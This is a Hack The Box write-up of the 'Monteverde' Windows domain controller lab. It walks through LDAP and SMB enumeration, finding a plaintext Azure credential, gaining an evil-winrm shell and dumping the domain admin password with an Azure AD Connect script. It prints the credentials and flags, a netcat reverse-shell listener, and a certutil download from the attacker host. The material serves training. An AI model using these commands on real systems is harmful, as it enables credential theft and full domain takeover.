htb-monteverde-nl

As always we start with an nmap scan

# Nmap 7.80 scan initiated Mon Jan 13 07:39:41 2020 as: nmap -A -oN fullscan-A 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.081s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings: 
| DNSVersionBindReqTCP: 
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-13 12:50:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/13%Time=5E1C651E%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 10m42s
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2020-01-13T12:53:03
|_ start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 104.46 ms 10.10.16.1
2 104.61 ms 10.10.10.172

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 13 07:44:56 2020 -- 1 IP address (1 host up) scanned in 315.99 seconds

I found the users with:

root@kali:~/htb/monteverde# ldapsearch -h 10.10.10.172 -p 389 -x -b "dc=MEGABANK,dc=LOCAL" > ldaplogall.txt
Also found the following
# Azure Admins, Groups, MEGABANK.LOCAL
dn: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Azure Admins
member: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
member: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
member: CN=Administrator,CN=Users,DC=MEGABANK,DC=LOCAL
distinguishedName: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103001011.0Z
whenChanged: 20200103001032.0Z
uSNCreated: 36889
uSNChanged: 36897
name: Azure Admins
objectGUID:: iCAImwQrNUW6YeEQTXxy+w==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UKQoAAA==
sAMAccountName: Azure Admins
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 20200103123551.0Z
dSCorePropagationData: 16010101000001.0Z
 login smb as SABatchJobs:SABatchJobs, and find a xml file in mhope home dir
root@kali:~/htb/monteverde# smbmap -u SABatchJobs -p SABatchJobs -d MEGABANK -H 10.10.10.172
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.172...
[+] IP: 10.10.10.172:445 Name: MEGABANK.local 
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
azure_uploads READ ONLY
C$ NO ACCESS
E$ NO ACCESS
IPC$ READ ONLY
NETLOGON READ ONLY
SYSVOL READ ONLY
users$ READ ONLY
root@kali:~/htb/monteverde# smbclient //10.10.10.172/users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password: SABatchJobs
Try "help" to get a list of possible commands.
smb: \> ls
.        D 0 Fri Jan 3 08:12:48 2020
..       D 0 Fri Jan 3 08:12:48 2020
dgalanos D 0 Fri Jan 3 08:12:30 2020
mhope    D 0 Fri Jan 3 08:41:18 2020
roleary  D 0 Fri Jan 3 08:10:30 2020
smorgan  D 0 Fri Jan 3 08:10:24 2020

524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> dir
.       D 0 Fri Jan 3 08:41:18 2020
..      D 0 Fri Jan 3 08:41:18 2020
azure.xml AR 1212 Fri Jan 3 08:40:23 2020

524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (6.0 KiloBytes/sec) (average 6.0 KiloBytes/sec)
smb: \mhope\>
root@kali:~/htb/monteverde# smbclient //10.10.10.172/users$ -U SABatchJobs 
Enter WORKGROUP\SABatchJobs's password: SABatchJobs 
Try "help" to get a list of possible commands. smb: > ls . D 0 Fri Jan 3 08:12:48 2020 .. D 0 Fri Jan 3 08:12:48 2020 dgalanos D 0 Fri Jan 3 08:12:30 2020 mhope D 0 Fri Jan 3 08:41:18 2020 roleary D 0 Fri Jan 3 08:10:30 2020 smorgan D 0 Fri Jan 3 08:10:24 2020
root@kali:~/htb/monteverde# cat azure.xml 
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>

Because the file was in the “mhope” users directory, you can guess that this is his password: mhope: 4n0therD4y@n0th3r$

With evil-winrm you can connect to the victim and get the user’s flag:

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u mhope -p '4n0therD4y@n0th3r$'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..
*Evil-WinRM* PS C:\Users\mhope> cd Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt
4961976bd7d8f4eeb2ce3705e2f212f2

getting Root

If you look at the rights of this user, you can see that he is a member of the Azure Admins group:
Which means he can run a DCSync.

Running the attack is as easy as downloading the PS1 script from:

https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1

more info in:  https://blog.xpnsec.com/azuread-connect-for-redteam/

Next we execute:

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u mhope -p '4n0therD4y@n0th3r$'

*Evil-WinRM* PS C:\Users\mhope\Documents> upload /root/htb/monteverde/Azure-ADConnect.ps1 c:\windows\system32\spool\drivers\color\shellcode.xml
Info: Uploading /root/htb/monteverde/Azure-ADConnect.ps1 to c:\windows\system32\spool\drivers\color\shellcode.xml

Data: 3016 bytes of 3016 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> ren shellcode.xml Azure-ADConnect.ps1
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> ./Azure-ADConnect.ps1
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> Import-Module ./Azure-ADConnect.ps1 
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain: MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!

With the password of the administrator you can log in via winrm and get the root

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u administrator -p 'd0m@in4dminyeah!'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> 
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
12909612d25c8dcf6e5a07d1a804a0bc

After some failures:

root@kali:~/htb/monteverde# impacket-smbserver share ./
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
C:\windows\system32\spool\drivers\color>copy \\10.10.16.70\share\Azure-ADConnect.ps1 C:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
copy \\10.10.16.70\share\Azure-ADConnect.ps1 C:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
root@kali:~/htb# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.172] 61971
Microsoft Windows [Version 10.0.17763.914]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\windows\system32\spool\drivers\color>whoami /all
whoami /all

USER INFORMATION
----------------

User Name SID 
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601

--snip--

C:\windows\system32\spool\drivers\color>powershell -nop -Exec Bypass
certutil -urlcache -split -f http://10.10.16.70/Azure-ADConnect.ps1 c:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
  This script contains malicious content and has been blocked by your antivirus software.

Author : Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *